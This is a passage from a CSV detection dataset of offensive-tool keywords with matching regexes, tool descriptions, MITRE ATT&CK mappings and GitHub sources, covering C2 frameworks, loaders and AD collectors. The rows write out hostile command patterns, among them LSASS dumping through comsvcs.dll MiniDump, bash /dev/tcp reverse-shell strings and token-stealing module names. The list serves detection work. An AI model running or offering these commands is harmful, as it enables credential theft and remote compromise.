TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*rundll32 merlin.dll,Merlin*",".{0,1000}rundll32\smerlin\.dll,Merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*rundll32 merlin.dll,Run*",".{0,1000}rundll32\smerlin\.dll,Run.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*rundll32.exe agressor.dll*dec*",".{0,1000}rundll32\.exe\sagressor\.dll.{0,1000}dec.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*rundll32.exe C:\Users\Public\*",".{0,1000}rundll32\.exe\sC\:\\Users\\Public\\.{0,1000}","offensive_tool_keyword","powershell","Defense evasion technique","T1218.011","TA0005","N/A","N/A","Defense Evasion","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id*",".{0,1000}rundll32\.exe\sC\:\\windows\\System32\\comsvcs\.dll\sMiniDump\s\(Get\-Process\slsass\)\.id.{0,1000}","offensive_tool_keyword","powershell","credential dumping activity","T1003.001","TA0006","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/22/g/analyzing-penetration-testing-tools-that-threat-actors-use-to-br.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*rundll32.exe* merlin.dll,Magic*",".{0,1000}rundll32\.exe.{0,1000}\smerlin\.dll,Magic.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*rundll32.exe* merlin.dll,Merlin*",".{0,1000}rundll32\.exe.{0,1000}\smerlin\.dll,Merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*rundll32.exe* merlin.dll,Run*",".{0,1000}rundll32\.exe.{0,1000}\smerlin\.dll,Run.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*RunDLL32JSStager*",".{0,1000}RunDLL32JSStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Run-EXEonRemote*",".{0,1000}Run\-EXEonRemote.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Run-EXEonRemote.ps1*",".{0,1000}Run\-EXEonRemote\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*RunExfil-78740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunExfil\-78740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*runFakeTerminal*",".{0,1000}runFakeTerminal.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*run-hiphp-tk.sh*",".{0,1000}run\-hiphp\-tk\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*Running final exploit packet*",".{0,1000}Running\sfinal\sexploit\spacket.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Running final exploit packet*",".{0,1000}Running\sfinal\sexploit\spacket.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*Running hijacking process*",".{0,1000}Running\shijacking\sprocess.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*running SharpHound*",".{0,1000}running\sSharpHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Running the exploit be patient................................*",".{0,1000}Running\sthe\sexploit\sbe\spatient\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","0","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*RunOF.exe -*",".{0,1000}RunOF\.exe\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*RunOF.Internals*",".{0,1000}RunOF\.Internals.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*run-pilot -targetIP *",".{0,1000}run\-pilot\s\-targetIP\s.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*RunRansomware-76740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunRansomware\-76740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*Runs a powershell command while attempting to bypass AMSI*",".{0,1000}Runs\sa\spowershell\scommand\swhile\sattempting\sto\sbypass\sAMSI.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*runShellcode*",".{0,1000}runShellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*runshellcode.asm*",".{0,1000}runshellcode\.asm.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*runshellcode.exe*",".{0,1000}runshellcode\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*runshellcode.o*",".{0,1000}runshellcode\.o.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*RunStealCookie-8B5C57DA-F404-ED11-82E4-0022481BF843.json*",".{0,1000}RunStealCookie\-8B5C57DA\-F404\-ED11\-82E4\-0022481BF843\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*RunStealPowerAutomateToken-8C5C57DA-F404-ED11-82E4-0022481BF843.json*",".{0,1000}RunStealPowerAutomateToken\-8C5C57DA\-F404\-ED11\-82E4\-0022481BF843\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* /bin/bash""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\/bin\/bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* /bin/sh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\/bin\/sh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* bash""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\sbash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* cmd""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\scmd\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* powershell""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\spowershell\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* pwsh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\spwsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* zsh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\szsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c* /dev/tcp/*/*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c.{0,1000}\s\/dev\/tcp\/.{0,1000}\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*RuralBishop.csproj*",".{0,1000}RuralBishop\.csproj.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*RuralBishop.exe*",".{0,1000}RuralBishop\.exe.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*RuralBishop.sln*",".{0,1000}RuralBishop\.sln.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*RuralBishop-master*",".{0,1000}RuralBishop\-master.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*russel.vantuyl@gmail.com*",".{0,1000}russel\.vantuyl\@gmail\.com.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*russel.vantuyl@gmail.com*",".{0,1000}russel\.vantuyl\@gmail\.com.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*rustbof.cna*",".{0,1000}rustbof\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*rustcat-3.0.0.zip*",".{0,1000}rustcat\-3\.0\.0\.zip.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rusthound * --zip --ldaps --adcs --old-bloodhound*",".{0,1000}rusthound\s.{0,1000}\s\-\-zip\s\-\-ldaps\s\-\-adcs\s\-\-old\-bloodhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*rusthound *--domain*",".{0,1000}rusthound\s.{0,1000}\-\-domain.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound *--ldapfqdn *",".{0,1000}rusthound\s.{0,1000}\-\-ldapfqdn\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD 